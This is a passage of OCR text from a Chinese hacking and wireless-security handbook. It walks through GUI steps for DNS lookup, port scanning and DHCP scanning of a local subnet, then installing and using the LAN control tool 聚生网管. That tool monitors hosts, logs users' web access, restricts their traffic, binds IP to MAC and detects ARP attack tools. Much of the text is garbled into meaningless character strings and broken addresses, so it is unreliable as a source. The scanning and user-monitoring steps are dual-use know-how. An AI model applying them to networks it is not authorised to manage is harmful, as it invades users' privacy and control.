厂 当 历 分 提 扣 相 外 袜 定 时 主机 以 到 人 4 何 台 把 或 者 。 厅 主机 村 客 理 H 启用 特 中 官 思 荣 咯 
在 “打分 和 后 直 页 下 管理 法 和 


i 日 者 
FE 厂 全 部 
未 厂 更 ucdbitf 示 厂 上 ta 志 厂 生物 Wwe 地 址 日志 
TF 厂 管理 反 示 厂 ls 厂 莹 明志 
厂 闻 四 提示 厂 Ni 提 示 厂 多 可 应 昌 志 读 
矿工 人生 对 扒 示 。。 厂 司 可 昭和 要 示 厂 工作 组 消息 志 。。 厂 网 i 册 和 E 击 
3 ae 


[step 图 单 去 “网 址 映射 列表 ”按钮 ， 即 可 打 
开 “ 网 址 映射 列表 ”对 话 框 ， 如 下 图 所 示 。 
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a 
机 入 要 多 i 隐 址 要 袜 http- /7 加 插 本 阿 ”入 
i EE 

和 过关 

J I 

i 

1126.114 167 

于 


on ker Teer 


其 忆 全 部 4 址 
re 


mm La 3 


在 “DNS 服务 器 IP” 文 本 区 域 中 选 


中 要 解析 的 DNS 服 务 器 后 ， 单 击 “ 开 始 解 
析 ” 按 钮 ， 即 可 对 选中 的 DNS 服务 器 进行 


ceed 


解析 ， 待 解析 完毕 后 ， 即 可 看 到 该 域名 对 
应 的 主机 地 址 等 属性 ， “如 下 图 所 示 。 

网 直 狐 抽 列 机 x 
答 入 要 船 忻 的 网 址 不 要 给 Ahetp: /人 ET | 
Te 一 周二 Be i 

es 过 2 

网 由 e 射 下 者 

Re De 


wow Pian een 和 we ma ao 
A 


Sm La or 


[step 了 在 “网 络 特 工 ” 主 窗口 左边 的 列表 中 
单 击 “互联 星空 ”选项 ， 即 可 打开 “互联 
星空 ”窗口 ， 在 其 中 即 可 进行 端口 扫描 和 
DHCP 服 务 扫描 操作 ， 如 下 图 所 示 。 


Gol 


英 口 扫 拱 参数 设置 x 
Tf 版 本 : | -| 协议 类 型 : TCF ”| 厂 昱 示 扫 指 进 度 
起 始 IF: |192. 168.0.2 
结束 IP: |192. 168.0.253 
Ersmal| 
3 
得 
国 ) 《< 常用 端口 
隐蔽 性 ] 
使 lc 地 址 mass (大写 ) 
和 IT 地 址 「52 168 0 104 进行 扫描 


step 图 在 设置 起 始 IP 和 结束 IP 之 后 ， 单 击 
Eee 按钮 ， 即 可 将 常用 的 端口 显示 
在 “端口 列表 ”文本 区 域内 ， 如 下 图 所 示 。 


黄 口 扫 接 参数 设置 x 
?版 本 : |IPv4 | 协议 类 型 : |TCP ”| 厂 显示 扫描 进度 
起 始 IF: [192. 168.0.2 
or | 
结束 IF : jez 168. 0. 253 
cancel | 
21, 23, 25, 53, 80, 110, 135- 
139, 161, 443, 8010, 8080 
国 ) AT 《常用 端口 
隐蔽 性 
使 用 IAC 地 址 |001E8CAD135F (大 写 ) | 
和 rp 地 址 [sz sgoi ”进行 扫描 


单 击 OK 按钮 ， 即 可 进行 端口 扫描 操 
作 ， 在 扫描 的 同时 ， 将 扫描 结果 显示 在 下 
面 的 “日志 ”列表 中 ， 在 其 中 即 可 看 到 各 
个 主机 开启 的 端口 ， 如 下 图 所 示 。 


选项 后 ， 单 击 “ 开 始 ” 按 钮 ， 即 可 打开 
“端口 扫描 参数 设置 ”对 话 框 ， 如 下 图 
所 示 。 


ee 
Ea 
| 
1-_ a 
[step 图 在 右边 的 列表 中 选择 “端口 扫描 ” Step 可 在 “互联 星空 ”窗口 右边 的 列表 中 


选择 “DHCP 服 务 扫描 ”选项 后 ， 单 击 “ 开 
始 ” 按 钮 ， 即 可 进行 DHCP 服 务 扫描 操作 ， 
如 下 图 所 示 。 
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全 末 生 网 管 过 才 村 去 甘 一 x 


许可 证 协议 
在 安装 肾 生 网 管 试用 版 之 前 ,请 检阅 授权 条 款 。 


检阅 协议 的 其 余部 分 ， 请 按 [Penn] 往 下 卷 动 页 面 * 


14.4 无 线 局 域 网 安全 辅助 
工具 


面 对 黑 客 针对 无 线 局 域 网 的 种 种 攻 
击 ， 无 线 局 域 网 管理 者 可 以 使 用 局 域 网 安 
全 辅助 工具 来 对 整个 无 线 局 域 网 进行 管 
理 。 本 节 将 介绍 几 款 最 为 经 典 的 局 域 网 辅 
助 软件 ， 以 帮助 大 家 维护 无 线 局 域 网 ， 从 
而 保护 无 线 局 域 网 的 安全 。 


14.4.1 聚 生 网 管 


聚 生 网 管 系统 是 聚 生 科技 在 深入 分 
析 了 主流 无 线 局 域 网 监控 软件 技术 的 基础 
上 ， 经 过 自主 创新 和 不 断 测试 ， 最 终 研发 
成 功 的 一 套 优秀 的 网 络 监 控 软 件 。 在 无 线 
局 域 网 的 任意 一 台 计 算 机 上 安装 该 软件 就 
可 以 控制 整个 无 线 局 域 网 的 P2P 下 载 、 各 种 
聊天 工具 、 股 票 软件 、 游 戏 软件 等 ， 使 得 
网 管 人 员 可 以 在 一 台 控 制 机 上 即 可 以 控制 
任意 一 台 无 线 局 域 网 主机 ， 从 而 极 大 地 提 
高 了 工作 效率 。 


1. 安装 聚 生 网 管 


Estee 回 双 去 下 载 的 聚 生 网 管 安装 程序 ， 即 可 
打开 “许可 证 协议 ”对 话 框 ， 在 其 中 可 以 
查看 软件 许可 协议 信息 ， 如 下 图 所 示 。 
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i 有 去 装 和 使 用 《 聚 生 了 网管》 的 用 户 必须 薪 足 并 严格 道 守 以 下 各 项 条 款 ， 否 则 请 人 ^ 
停止 安装 、 使 用 和 传播 : 


一 、《 桶 生 网 管 》 受 中 华人 民 共 和 国 着 作 权 法 及 中 国 和 国际 着 作 权 条 约 和 其 它 知 
各 十 的 保护， 用 户 不 得 有 任何 侵害 《 聚 生 网 管 办 相 关 一 切 权利 的 行 


加 、 吏 生 网 管 几 产品 生产 本 、 、 随 附 的 各 种 资料 一 切 所 有 权 和 知识 产权 均 由 大 执 v 


rr 提 5 (1 ， 
DEL] 


[BE 图 单 去 “我 接受 ”按钮 ， 打 开 “ 选 定安 
装 位 置 ” 窗口， 在 其 中 设置 程序 的 安装 目 
标 文件 夫 ， 如 下 图 所 示 。 


忌 民生 网 营 试 用 版 去 甘 和 x 


选 定安 装 位 置 
选 定 聚 生 网 管 试用 版 要 安装 的 文件 夫 。 


Re 


目标 文件 夹 
[ED 


浏览 (B) 


所 震 空间 : 22 9 
可 用 空间 : 54. 46B 


CE-S() 取消 (c) 


step 图 单 击 “ 安 装 ” 按 钮 ， 即 可 开始 安装 聚 
生 网 管 程序 ， 并 显示 安装 的 进度 ， 如 下 图 
所 示 。 


正在 安装 
票 生 网 管 试用 版 正在 安装 ， 请 等 候 。 
复制 到 : D: \LanQos\Foliey\ 只 限制 网 络 芝 戏 第 申 


显示 细节 CO) 


于 一 多 名) 英 闲 ( 到 青 () 


step 回 安装 完成 后 ， 弹 出 “安装 完成 ” 窗 
口 ， 单 击 “ 关 闭 ” 按 钮 ， 完 成 程序 的 安 
装 ， 如 下 图 所 示 。 


| ES mA 


2. 聚 生 网 管 的 配置 


在 使 用 聚 生 网 管 这 款 软件 之 前 ， 需 要 
先 对 其 进行 配置 ， 配 置 聚 生 网 管 的 具体 操 
作 步 又 如 下 : 

EGG 国 达 择 “开始 ”一 ，“ 所 有 应 用 ”一 “村 
生 网 管 ” 菜 单项 ， 即 可 打开 “监控 网 段 配 
置 ” 窗 口 ， 如 下 图 所 示 。 


监控 网 耻 配置 一 x 
si 
惠风 所 生 演 
oes 
请 上 近 风 经 

Fa 

ee be 3 i 

| 天; 之 人 林寺 了 再 计 上“ 下 上 这 时 可 

| 进入 三男 国 ， 


[step 图 在 进行 监控 之 前 ， 需 要 添加 要 监控 的 
网 段 ， 单 击 “ 新 建 监控 网 段 ” 按钮 ， 即 可 
打开 “网 段 名 称 ” 对 话 框 ， 如 下 图 所 示 。 


RE x 


> 监控 网 段 配置 本 


和 


VIAN 2017081 4182339 


下 :县 合用 2 网 了 名 各 /多 出 现 司 包 网 上 有 革 天 正 寺 这! 


| | [本 
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[sep 图 在 “请 输入 新 网 段 名 称 ” 下 方 的 文本 
框 中 输入 网 段 的 名 称 之 后 ， 单 击 “ 下 一 步 ” 
按钮 ， 即 可 打开 “选择 网 卡 ” 对 话 框 ， 如 下 
图 所 示 。 


网 卡 EE 


man. 要 


下 为 网 名 选择 对 应 的 网 卡 更 新 交 卡 信息 


Atheros L1 Gigabit Ethernet 101100/1000BaseTContrcller 加 


#8 192.168.0.104 

二 MACd 直 : 00.TE-8C-AD-13-5F 

Fm 2552552550 

at 村 19216801 

i 19216800 ~ [192168.0.255 
NMAC : [rea3cD0-335073 || Wm 


Eh 于 久 宫 击 “ 柱 出 ” 技 往 以 术 本 网 洗 竹 接 杖 况 ; 如 果 最 党 能 
ing 退 网 关 “ 则 党 肖 网 络 正 生 可 以 总 柄 下 一 步 损 作 ; 否则 等 登 录 网 关 p 路 由 器 、 
ee 兵 有 殉职 正确 的 网 天 MACH9 引 了 


< 上 > [TEN E79 
为 该 网 段 选择 对 应 的 网 卡 后 ， 单 击 
i es 按钮 ， 即 可 打开 “出 口 带 宽 ” 
对 话 框 ， 如 下 图 所 示 。 


DER 


Py 监控 网 段 配置 要 


下 网 段 公 网 出 口 溉 入 过 : 


Es 现 | 而 


[stsp 图 在 “本 网 段 公 网 出 口 接 入 带宽 ” 右 侧 
的 下 拉 列 表 中 选择 “Auto Detect (自动 检 
测 ) ”选项 后 ， 单 击 “ 完 成 ”按钮 ， 将 会 
返回 “监控 网 段 配置 ” 窗 口 ， 在 其 中 即 可 
看 到 所 配置 的 监控 网 段 信息 ， 如 下 图 所 示 。 
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上 监 注 网 各 本 二 一 炎 
ee 
新 建 多 网 段 监控 
第 驾 鉴 控 网 段 
删除 鉴 控 网 段 
清空 监 皖 网 良 
开始 监控 


注 : 如 果 你 尚未 创建 网 段 ， 则 可 以 点 去“ 新 建 监控 网 段 ” 即 可 进行 创 
建 ; 之 后 你 可 以 双击 监控 网 段 或 单 主 选中 然后 点 调 “ 开 始 监控 ” 即 可 
进入 主 界面 。 


step 较 当 确定 所 配置 的 监控 网 段 信息 准确 无 误 后 ， 单 击 “ 开 始 监控 ”按钮 ， 即 可 打开 “ 聚 
生 网 管 ” 主 窗口 ， 如 下 图 所 示 。 


国 本 风格 V2016 了 用 须 网 反 名 林 WUAN_2017081418233 引 “7 
设置 操作 日 志 显示 访问 关于 升 和 帮 有 远 得 协 动 


“oe.0 000088 0 0 © © nn 


记功 入 理 所 痢 主 只。 配置 第 咯 攻 限 括 件 。 日 二 本 调 | 产品 光 篇 。 同 关 NH。 使 有 38 。 宇 见 是。 访问 计 同 。 移交 全 。 ES32 们 外 让 友 广 丛 ,一些 式 同 队 
| Das Oememwn 和 Nam TE “| BN | ,3 | 。 USB] 各 有 部/ 埠 ， 徐 动 攻 性 和 手机 着。 不 避 08LS6 居 村 绎 者 ， 池 入 R 从 。 
| 口 生动 对 上 天 二 半身 锯 口 ] 自动 枢 上 竹 机/ 平 奈 。 口 自 动 莫 随 条 if 丫 弄 上 作 沿 P 门票 上 站 MAC 。 癌 史 直 PROMAC 几 二 电 及 。 口 Rfe 尝 PIDMACN 二 电 且 上 网 
1 条 入 辽 册 主机 各 (认同 可 人 后) 上 行 000 KB/S) (SF(0.00 KBAS) 济 扩 MM _ 所 用户 罗 9 日 志 。 半 个 只 户 汪 辣 去 (在 三 和 于 中 可 王 】 Dv Om 
DM 192168.0404 sam on0 ooo I oo wa 3 源 pP 地 址 下 主 作 ， 源 M-。 所 的 | 地址。 目的。 坊间 内 容 


< 》 
口 凉 YIP/MAC 做 站 各 :WARP 到 二 思科 现时 wifijwifi 共 站。 思科 测 二 关中 / 手 机/ 于 枝 。 | 理 恬 


i 2 IPB 外 MACXBMt。 狠 簿 
把 和 | 2 
太 多 玉 闪 实证 也 岂 辽 站 从 邓 丙 瑟 过 服务 区 闪 庆 这 子 打 开 ， 乱 制 ， 能 改 、 和 财 退 从 日 志 ， 尝 全 字 尼 a 
ba le :1 在 竹 :1 本 竹 :0 到 生 网 车 天 综 国 广 叭 一 志 全 村 止 志 震 下载、 禁止 QQ 尝 戏 、 限 币 D25 网 阁 栅 5 等 


侈 提示 : 用 户 可 以 根据 需要 建立 多 个 网 段 。 如 果 想 监控 第 二 个 网 段 ， 请 再 次 打开 一 个 聚 
生 网 管 的 窗口 ， 从 中 选择 想 要 建立 的 第 二 个 网 段 ， 然 后 单 击 “ 开 始 监控 ”按钮 即 可 。 


3. 聚 生 网 管 的 使 用 


在 配置 完 聚 生 网 管 要 监控 的 网 段 后 ， 就 可 以 利用 该 工具 对 整个 无 线 局 域 网 进行 管理 ， 
其 具体 操作 步骤 如 下 : 
[step 图 在 “ 聚 生 网 管 ” 主 窗 口中 ， 单 击 “ 启 动 管理 ”按钮 ， 即 可 扫描 到 所 有 在 线 主机 ， 并 
在 下 方 的 列表 中 显示 出 来 ， 如 下 图 所 示 。 


E> #4 
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国 = 
设置 杉 作 日 去 显示 访问 关于 逢 和 帮 肥 ”运算 协 芭 


eeeeoeeseeee59 ee 


访问 襄 网 皇 得 合式 二 至 考 位 .一 此 区 内 闪 | 
口 2 笑 。 口 Se 加 入 二 并 | 二 RN 帮 ~ 2 号 则 | 。 要 SU50 尖 和 pf 二 记 就 革 而 要， 夭 动 更 呈 玉 于 如 等 ， 下 网 L0 二 村 二 要 ， 人 
口 抹 上 天 给 和 由 顺口] 所 开 上 手机/ 二 虎口 引 村 月 随 半 wii 门生 上 人 改口] 美 目 估 改 MAC 。 门 兴 呈 示 P 和 MAC 绎 定 电 脑 站] 只 人 放 ip 和 MAC 提 定 电 及 上 同 
1p 地 由 打印 过 制 主机 名 (点 二 村 性 (上 行 (155.17 K。 ( 癌 | 下 厅 (167434 和 达 凌 S 志 所 而 广 访 本 去。 第 个 有 疡 沪 总 志 ( 在 主机 表单 主 ) Dt ORs 
D192158.0104 控制 15517 167484 Es Ee [7 
口 时 192158.0112 AFOIG-511211.. 030 ao 这 二 下 到 
口 是 192168.0106 DEskTOP.sCV.. oo0 oo 这 六 下 号 
口 是 192.168.0.107 DESKTOP-D5K.. 090 000 连接 正 党 
口 本 192168.0109 -- oo0 oo0 二 EF 
口 量 192168.0108 网 上 和 技 oo0 00 连 六 下 村 
口 时 192168.0414 AFolG-702111.。 op0 ao0 is 和 
口 是 192158.0.102 一 090 0o0 连接 正 某 
D10215a0105 -- oa0 ao 法 SE 


口 三 P/MAC 化 口感 ARP 实 二 回 检测 二 身 wii/wif 汪 束 。 可 栓 册 天才 站 和 祷 / 手 I/ 平 柏 。 下 看 


下 加 2 Pet MACta 直 了 
a 庆生 岂 辣 晤 且 内 产后 展 估 辣 ， 信 亲民 生意 、 功 训 宕 下 启 扫 后 上 网 官 机 加 从 ， 洋 慷 友 比 
a :9 本 :9 丙 活 :0 民生 网 和 村“ 闻 新 直 友 ” 妆 风 ,入网 管理 天 上 风行 放电 埋 ， 最 简单 1 


step 园 选中 主机 前 面 的 复 选 框 ， 即 可 开始 控制 并 显示 计算 机 宽带 、 上 网 网 址 或 拦截 日 志 等 
信息 ， 如 下 图 所 示 。 取 消 选中 则 所 有 控制 全 部 失效 。 


| 图 要 生 网 入 V2016 凡 用 上 网 各 全 称 :VLAN_20170814182339] 一 HE x 
设置 损 作 日 志 里 示 访问 关于 升 嫩 帮 阳 运程 办 册 


‘cr 
QQeeeeoeeeoegeeeeee ee 
售 此 监控。 汉 研 主机 sdb 


CE EE 网 由 “| SA 358 沽 站 名 的 多 坟 大 党 而 要 ”入 动 本 全 击 于 好 等 下 虽 肚 L66 名 折 刍 要， 汪 术 和 化 
口 所 动 鞠 目 无线 中 出 癸 口 s_ 生 上 上手 人 /二 概 荔 学 月 随身 wif 口 涤 上 ye 改 |P 口 委 上 攀 六 MAC 。 口 兴 王 示 )P 和 MAC 纤 定 电 脑门 只 大 许 jp 和 MAC 持 定 史 用 上 网 


1P 翅 址 ( 打 多 控制 ) 主机 名 (点 主 修改 | 必 ) 上 行 (0.00 XB/S) (名 ) 下 行 (0.00 K8/S) ”连接 状态 MAC 地 址 所 商用 户 党 问 日 去 。 单个 储户 访问 日 志 ( 在 三 中 稚 m! [mL 

口 需 192.168.0.104 控制 几 000 000 连 拉 正 号 00:1EECAD:135F | 访问 时 间 的 议 % 型 。 源 Pitb 址 源 M.。 日 的 IP 地 址 上 

口 时 1921680112 AFOIG-511211.. 020 oo 这 正和 ca6O0GGCCCD1 

口 时 192168.0106 DEskTOP.SCV.. 020 oo0 这 近 正 避 002324D9B6E5 || 2017.8.14 139557 WwWwis 192158.0.107 DES.. Sf. T8223212 a 

回 寺 192168.0107 DESKTOP-D5K.。 020 oo 过 下 和 S&FBRBAFBS810 || 2017-8-14 190557 WWWib 1921680407 DES-。 S&F 11723279 ad 

口 旺 1921680109 -- 00 oo0 放大 ToE7zcD31124 | 2017-8-14 190602 Wwwisia 1921580107 DFS SBF 2183011624 ad 

口才 192168.0.108 网 痢 科 技 000 ooo 这 拉 下 等 

口 是 192158.0114 AFolG-762111.。 020 oo 这 于 

口 三 1921580.102 一 090 Qo0 bad B48E:52:38:17.01 

D102168.0105 -- 020 oo 过 于 EDpD:CeCO1A5D 

口 昌 1921590101 000 aoo 这 沪 下 所 Au44DHDM487B 

口 枉 1921580.100 一 1000 000 这 拉 正 尝 As5E6G1G7TAA1 

D1921680103 一 0D00 000 二 EF 寺 68fB7EEAFCFA < = 2 
口 守 IP/MACE 口 输 党 ARF 史 二 回 检 8 用 whiwi 共 可 。 团 检 届 无 绪 活 名/ 手 机/ 
Ba] = Pat MACItE 。 本 还 

二 各 三 闪 实 廊 作 几 罗 从 全 珊 ) 环 、 室 儿 ， 桥 改 、 交 贱 绽 作 妥 杰 ,这 千 吉 比 雪 生 局 富 全 压 内 关 和 惰 估 结合 胃 后 生意 ， 功 训 居 区 后 WW 后 上 局 芝 棋 闪 妊 ， 洋 竹 吉 比 

站 太 :上 让 EE 


[step 图 在 主机 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “控制 全 部 主机 ”菜单 命令 ， 即 可 控 
制 全 部 主机 ， 如 下 图 所 示 。 

[step 园 虽然 可 以 控制 全 部 主机 ， 但 只 是 让 用 户 查看 带宽 ， 并 没有 对 主机 进行 其 他 的 控制 。 
如 果 想 启用 各 种 控制 (如 下 载 、 聊 天 等 ) ， 双 击 某 台 主机 信息 ， 即 可 弹出 “新 建 策略” 
消息 框 ， 将 看 到 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 个 策略 吗 ? ”对 话 框 ， 如 下 图 
所 示 。 
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回 是 1921630. 


肾 生 网 管 V2016 


@ sss meer ss 


Ed) 古 


车 要 新 建筑 略 ， 则 需要 单 击 “是 ” 按 
钮 ， 即 可 打开 “策略 名 ”对 话 框 ， 在 “请 
输入 策略 名 称 ” 文 本 框 中 输入 一 个 策略 的 
名 称 ， 例 如 “局 域 网 ”， 如 下 图 所 示 。 


| 第 x 
请 确 入 逢 小 名称 确定 
局 网 J] Lm 


[step 园 单 击 “确定 ”按钮 ， 将 打开 “编辑 策 
略 [局 域 网 ] 的 内 容 ” 对 话 框 ， 在 其 中 分 别 设 
置 “网 络 限制 ”“ 带 宽 限 制 ”“P2P 下 载 限 
制 ” “流量 限制 ”“ 普 通 下 载 限制 ”“ 游 戏 
限制 ”“ 股 票 限制 ”“ 聊 天 限制 ”“ACI 规 
则 ”“ 时 间 设 置 ” 等 选项 卡 ， 如 下 图 所 示 。 

编辑 策 络 [ 局 域 网 的 内 容 x 
ERRN 区 as。 因 避 a 
[a Es 


多 网 吉 扫 博 耻 制 
国志 


志 了 KR。 侈 ACL 规则 
Ci [Es] 
时 P2p 下 载 限制 


山 法 县 限制 
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和 i 后 机 4 | 比 人 定 2 损 
Bs A 个 六) EE Pe step 回 设置 完 尘 上 后 3 单 二 “确定 中 闭 村 5 
En 即 可 完成 创建 策略 。 单 击 “配置 策略 ” 按 
te 钮 ， 打开 “策略 编辑 ”对 话 框 ， 即 可 看 到 
Eph 添加 的 策略 ， 如 下 图 所 示 。 

回 题 192.163.0， 

回 册 1921630. 国 吉 ss x 
回 大 1921630- 注 : 为 了 全 如 多 下 要 策 史 的 帘 烦 ， eT 区 可 以 直接 ( 也 可 以 刀 辑 、 交 更 这 此 第 

回 是 1921690. 下 ) 蕊 二 6 外 要 和 的 个 到 各 分 或 全 部 电 有 ; 局， 在 必 因 电 肪 泊 守 扩 开 后 nn 


和合 在 “主机 内 表 ” 克 证 上 角 ) , 便 表 和 统 或 玉生 凡生 直 实 


人 earress A 

人 -==ass ES 
ER 

[| 

人 Hess Ee 

人 seem em 
再 和 

© -san 


CV ss my 


注 1 ; 名 建筑 叶 后 可 以 再 二“ 拍 折 条 中” ， 癸 得 部 分 到 包 有 二 
注 > : 一生 5 便条 员 下 有 忆 尝 习 上 风 要 生 玉 | a me. 


建立 好 策略 后 ， 用 户 可 以 在 主机 列表 
窗 格 中 ， 双 击 其 他 “未 指派 策略 ”的 主机 指 
派 已 经 建 好 的 策略 ， 也 可 以 再 建 一 个 新 的 策 
略 。 若 想 再 建 一 个 策略 ， 双 击 该 台 主 机 ， 
弹出 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 
个 策略 吗 ? ”对 话 框 ， 如 下 图 所 示 。 


票 生 网 管 V2016 


苯 


(7?) 个 已 既定 义 过 策略 ， 现 在 交 尖 新建 一 个 第 跟 吧 7? 


Ca [sn 


单 击 “是 ”按钮 ， 可 以 继续 新 建 一 个 
策略 ; 而 单 击 “ 否 ”按钮 ， 将 弹出 “重新 
指派 策略 ”对 话 框 ， 可 以 重新 指派 刚才 定 
义 的 策略 ， 或 者 仍旧 保持 “未 指派 策略 ” 
状态 ,设置 完成 后 单 击 “确定 ”按钮 ， 即 
可 成 功 设置 指派 策略 ， 如 下 图 所 示 。 


[加 国 如 果 起 对 所 有 的 主机 或 者 一 部 分 主机 
都 应 用 同一 个 策略 ， 要 在 “ 聚 生 网 管 ” 主 
机 列表 窗 格 中 右 去 ， 在 弹出 的 快捷 菜单 中 
选择 “批量 指派 策略 ”菜单 命令 ， 如 下 图 
所 示 。 


Titt6 打 名 皖 轴 主机 生 (S 二 本 加 (2 上 :O04 KBJS) (3 下 
口 时 1921660104 3 O04 
口 0 

口 本 192168.0105 ( 。 党 册 和 于 站 
口 时 1921660107 上 


为 三 主人 括 泊 和 中 IN 


[EE 轿 打开 “策略 指派 设置 ”对 话 框 ， 左 右 
两 侧 分 别 为 已 经 指派 策略 的 主机 和 未 指派 
策略 的 主机 ， 用 户 可 以 把 其 中 的 一 个 已 经 
建立 好 策略 的 组 或 未 建立 策略 的 组 里 面 的 
所 有 主机 ， 全 部 指派 到 右 侧 的 某 个 策略 组 
里 面 或 未 指派 的 策略 组 里 面 ; 右 侧 的 同样 
也 可 以 指派 到 左 侧 的 组 里 面 ， 如 下 图 所 示 。 


i 
语 二 二 须 Ee 
i = Lo) 
Ee 元 和 ee 
Pie #0 et EE 2 
Rs) | ww680m2 。 wow enznox 
Bm) ,oveaotoe 。。 poEsropscvaNal 
px | 1921680107 = DESKTOP-DSKFISE 
Tce | 1921640109 
一 ”azteaon4 ArolGTozlll221 
19pTeh0107 
192.1680105 
1921ca0101 
oo * 


汪 : 一 机 在 左 巡 下 过 只 六 远洋 “来 漠 尺 和 车 则 时 于 泊 有 末 指 不 和 六 主人 二 在 这 的 下 脱皮 如 量 全 二 个 旨 J 权 
MeN MEE ERR EN Ei EE EE 
王 所 乔 梧 入 一 从 位 生 于 他 村 二 到 于 条 兴 ， 


[Sep 有 在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 安 
全 防御 ”按钮 ， 在 弹出 的 下 拉 列 表 中 选择 
“IP-MAC 绑 定 ” 选 项 ， 打 开 “IP-MAC 绑 
定 ” 对 话 框 ， 在 其 中 可 以 设置 IP-MAC 绑 定 ， 
如 下 图 所 示 。 


国 Fvcee x 

RP-MAceA gE 

:em eo ne tne wc 
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Ee 
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EE 
BNP MACE 
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EE 

DP MAC .eR 
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[Step 图 单 去 “获取 IP-MAC 关 系 ” 按 钮 ， 即 
可 在 左 侧 的 窗 格 中 显示 获取 的 I[P-MAC 关 
系列 表 信 息 ， 然 后 通过 单 击 “ 手 工 添加 绑 
定 ” 按 钮 进行 IP-MAC 关 系 的 绑 定 操作 ， 如 
下 图 所 示 。 


国 P-MAcs 二 X 
回 富 对 P-MAC 地 直 癌 定 
于 : 在 启 且 此 各 之 高 。 诸 兢 你 后 城 网 站 记 对 冯 有 在 汗 记 六 千 中 突 六 和 人 -MAC 部 
下 和 OR 有人 
主 有 名 pe MAC 地 址 主 现 品 明 于 取 P-MAC 关 么 
| 国 和 ote-611. 1921680.112 cai0003CCCD1 AFOIG-611211054 手工 和 jng 定 
国 ossxrop 5. 1921680106 002324D986E5 DESKTOp_5CVB- Pe 
1921680107 S88S4F8S810 DESKTOP-DIKF 
1921680109 70472CD31124 志 AE 
1921630108 = 4045EFDEA9D3 Rig 
国 wrolc7oz、igzieaoni4 cocaaarpaeoe arole70222 | Sapacn 
e21030102 otaE52a01701 一 sece | 
四- Tea16ao105 ED9pcocona SNPHAcR | 
1ga16a0101 。。 Ah44D1Daa79 
| 四- 1921680100 。。 A45E6O167IAA1 We 
口 = 式 关 刺 新 主机 并 运行 至 定 
口 汪 REP-MAC4tTP4f .发送 竺 上 关 生 了 网 络 安全 ， 这 不 要 随 坦 修改 |5， 你 的 际 兴 1? 为 %sr5 ， 尘 丙 失修 歼 为 其 
口 SIP-MAC 和 他 对. 靳 条 渤 二 册 公 网 :等 
sp | 
step 贺 为 了 保证 无 线 局 域 网 的 安全 ， 防 止 


无 线 局 域 网 内 其 他 用 户 用 聚 生 网 管 扰乱 无 
线 局 域 网 ， 该 工具 还 提供 了 防护 “网 内 其 
他 运行 记录 ”功能 ， 单 击 “ 安 全 防御 ” 按 
钮 ， 在 弹出 的 下 拉 列 表 中 选择 “网 内 其 他 
运行 记录 ”和 选项， 打开“ 局 域 网 本 软件 运 
行 记 录 ” 对 话 框 ， 聚 生 网 管 的 正式 版 可 以 
强制 测试 版 、 试 用 版 的 聚 生 网 管 退出 ， 并 
且 记 录 下 运行 聚 生 网 管 的 主机 的 机 器 名 、 
运行 时 间 、 网 卡 、IP， 以 及 系统 对 其 处 理 结 
果 等 信息 ， 如 下 图 所 示 。 


局 域 网 本 软件 运行 记录 凑 
局 域 网 内 其 他 主机 运行 本 软件 发 现 记 录 回 强 抽 试 用 版 退出 ! 
时 间 lp 地 址 主机 名 网 卡 地 址 处 理 结果 
< > 


step 了 利用 聚 生 网 管 可 以 检测 当前 对 无 线 局 
域 网 危害 最 为 严重 的 三 大 工具 : 无 线 局 域 


295 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


网 终结 者 、 网 络 剪 刀 手 和 网 络 执法 官 。 在 
“ 聚 生 网 管 ” 主 窗口 中 单 击 “ 安 全 防御 ” 
按钮 ， 在 弹出 的 下 拉 列 表 中 选择 “安全 监 
测 工具 ”选项 ， 打 开 “ 安 全 监测 工具 ”对 
话 框 ， 在 其 中 即 可 看 到 局 域 网 攻击 检测 工 
具 和 局 域 网 ARP 病 毒 、ARP 攻 击 专 项 检测 工 
有 具 等 ， 如 下 图 所 示 。 


安全 监 WT 具 x 
一 、 局 类 网 混 录 模式 节点 性 测 具 
本 工具 可 以 检测 局 域 网 内 网 卡 处 于 漫 杂 模式 的 节点 ,以 发 现 嘎 探 软件 或 其 他 网 管 类 软件 
a 
二 、 局 址 网 区 地 丛 测 具 
系统 可 以 检测 当前 局 域 网 三 大 工具 软件 : 局 域 网 终结 者 、 网 阁 芝 刀 手 、 网 党 涩 法 证 
bs 
三 、 局 大 网 ARP 病 碍 、ARP 攻 二 专项 愉 测 工具 a 
aaapgpop 
网 卡 地 址 
< > 
| 


step 矣 单 去“ 局 域 网 攻击 检测 工具 ”栏目 中 
的 “开始 检测 ”按钮 ， 即 可 打开 “局 域 网 
攻击 软件 检测 工具 ”对 话 框 ， 如 下 图 所 示 。 


六 局 城 网 攻 二 软件 检 出 工具 ox 


检测 结果 


单 击 “ 开 始 检测 ”按钮 ， 即 可 打开 是 
否 使 控制 服务 处 于 停止 状态 提示 框 ， 如 下 图 
所 示 。 


重要 提示 


在 进行 攻 二 工具 检测 时 村 生 网 管 六 市 服务 必须 和 时 停止 ， 
诲 车 先 停止 一下 过 记 展 务 ， 等 检测 幸 毕 再 生气 富 功 1 


青玉 审 服 务 现在 呈 外 于 休止 状 坊 吗 7 
[sm ] | sm 


Be 图 单 去 “是 ”按钮 ， 即 可 检测 整个 无 线 局 
域 网 中 是 否 存在 无 线 局 域 网 攻击 ， 同 时 将 检测 
的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 
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[step 图 单 击 “ 聚 生 网 管 ” 窗 口中 的 “扩展 插 
件 ” 按 钮 打开“ 扩展 插件 ”对 话 框 ， 在 
其 中 即 可 看 到 聚 生 网 管 自 带 的 扩展 工具 ， 
如 下 图 所 示 。 


[ x 


所 贡 相生 网 管 站 下 万 肪 芝 提问 (以 全 能 怕 吕 的 


尼 生 网 等 外 来 电报 近 和 藉 呈 大 关于 北京 效 件 工程 限 公司 闪光 一 让 厅 门 用 于 卫 世 外 宁 电 
ee 


Rs 起 了 网 生 人 员 更 池北 尝 和风 和 理 ， 伟 二 风 辽 ， 

局 江 哥 生 网 管 二 机 导 军 要 报 工具 ( 仅 全 衣 怕 近代 ) 
必 生 网 和 局 过 网 主 从 措 守 入 工 具 是 大 分 手 [ 训 软 件 工种 有 了 公司 从 
三 本 网 寺 寺 各 务 薪 ， 工 人 Ei 或 其 任 莽 主机 的 安村 位 生 工 只 。 育 这 此 基 术 


